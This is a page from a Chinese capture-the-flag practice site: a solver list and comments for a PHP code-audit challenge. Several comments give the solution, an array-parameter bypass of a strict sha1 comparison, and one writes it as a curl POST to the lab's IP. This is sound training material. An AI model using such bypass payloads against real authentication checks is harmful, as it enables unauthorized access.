评分(5)
解题动态
沐头人 攻破了该题 7小时前
QIANCJ 攻破了该题 11小时前
18599298628 攻破了该题 19小时前
huasan2410 攻破了该题 1天前
serein007 攻破了该题 1天前
追风的牛牛 攻破了该题 1天前
手可摘星辰2 攻破了该题 1天前
花猫咪 攻破了该题 2天前
gm26ctf 攻破了该题 2天前
1234165 攻破了该题 2天前
kimol 攻破了该题 3天前
nonlvyx 攻破了该题 3天前
qqai 攻破了该题 4天前
路人甲1123 攻破了该题 5天前
AWDAI 攻破了该题 5天前
wauo3 攻破了该题 5天前
bilabu 攻破了该题 5天前
niubill 攻破了该题 5天前
青春小豆 攻破了该题 5天前
评论
zoefeng 11月前
举报
curl -X POST "http://117.72.52.127:16987/?uname[]=a&id=margin" -d "passwd[]=b"
asddddd 11月前
举报
我用0e绕过sha1为啥不行,为什么只能数组绕过
ShawnWang04 10月前
举报
因为是=== 不是==
一个姓⎝李⎠的师傅~ 1年前
举报
题目挺好,各种细节和基础知识的考验,基础知识恶补: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#VbWHy
ubudj 1年前
举报
?uname[]=1&id=margin POST: passwd[]=2
zhenhui 1年前
举报
GET: ?uname[]=1&id=margin POST: passwd[]=2
wywsssf 1年前
举报
链接后面加?uname[]=1&id=margin,同时POST中passwd[]=2
ctfer-pls 1年前
举报
GET:id=margin&uname[]=111a POST:passwd[]=2bba
2686213396 1年前
举报
flag{*********}
2686213396 1年前
举报
我喜欢hackbar这个插件(POST方法的最优选择),相当于帮你写好请求头格式的bp,只需要填写上传的参数即可,本题思路,直接url传参uname和id,通过数组实现绕过,再由hackbarPOSTpasswd的参数,获得flag,这道题目的核心依旧是代码审计
iNMB 1年前
举报
很奇怪bp不行,用其他方法可以不知道为什么